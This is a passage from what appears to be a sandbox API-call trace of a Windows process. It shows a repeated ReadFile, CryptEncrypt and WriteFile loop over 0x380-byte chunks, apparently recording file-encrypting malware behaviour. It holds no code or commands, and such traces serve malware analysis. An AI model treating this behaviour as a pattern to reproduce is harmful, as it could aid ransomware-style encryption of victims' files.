lpOverlapped=0x0) returned 1 [0269.383] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.383] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.383] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.383] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.383] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.383] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.383] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.383] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.383] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.384] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.384] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.384] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.384] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.384] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.384] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.384] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.384] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.384] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.384] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.384] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.384] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.384] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.384] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.385] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.385] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.385] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.385] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.385] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.385] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.385] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.385] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.385] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.385] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.385] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.385] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.385] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.385] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.385] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.386] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.386] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.386] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.386] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.386] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.386] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.386] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.386] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.386] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.386] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.386] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.386] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.386] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.387] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.387] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.387] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.387] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.387] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.387] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.388] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.388] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.388] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.388] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.388] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.388] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.388] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.388] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.388] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.388] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.388] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.388] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.388] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.388] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.389] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.389] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.389] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.389] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.389] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.389] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.389] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.389] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.389] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.389] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.389] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.389] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.389] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.390] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.390] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.390] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.390] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.390] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.390] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.390] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.390] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.390] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.390] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.390] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.391] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.391] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.391] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.391] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.391] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.391] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.391] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.391] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.391] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 